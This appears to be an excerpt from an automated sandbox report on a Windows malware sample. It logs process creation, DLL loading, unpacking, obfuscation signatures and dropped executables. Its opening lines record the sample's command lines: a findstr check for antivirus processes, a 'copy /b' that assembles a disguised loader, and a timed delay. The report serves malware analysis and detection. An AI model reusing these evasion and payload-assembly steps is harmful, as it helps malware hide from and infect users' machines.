Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: M13W1o3scc.exe

Static file information: File size 1210490 > 1048576

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.jozizud:R;.raxup:R;.maweb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

PE file contains sections with non-standard names

Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .jozizud
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .raxup
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .maweb
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .jozizud
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .raxup
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .maweb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DE93F push edi; ret	15_2_000DE941
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEA58 push esi; ret	15_2_000DEA5A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118A4A push FFFFFF8Bh; iretd	15_2_00118A4C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D8B75 push ecx; ret	15_2_000D8B88
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CCBDB push eax; retf	15_2_000CCBF8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEC33 push esi; ret	15_2_000DEC35
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DED1C push edi; ret	15_2_000DED1E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411716 push ecx; ret	15_2_00411729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00410D35 push ecx; ret	15_2_00410D48
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0043EFB3 push dword ptr [esp+ecx-75h]; iretd	15_2_0043EFB7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B035 push ecx; ret	16_2_0041B048
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040020D pushfd ; iretd	16_2_00400211
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79FD push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8DFB push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79EE push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E4A1F push 7DD07DC0h; iretd	16_2_007E4A30
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8E02 push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E3F19 pushfd ; iretd	16_2_007E3F1C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB29C push ecx; ret	16_2_022BB2AF

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Jump to dropped file

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_001359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		15_2_001359B3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		15_2_000C5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_000D33B7

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
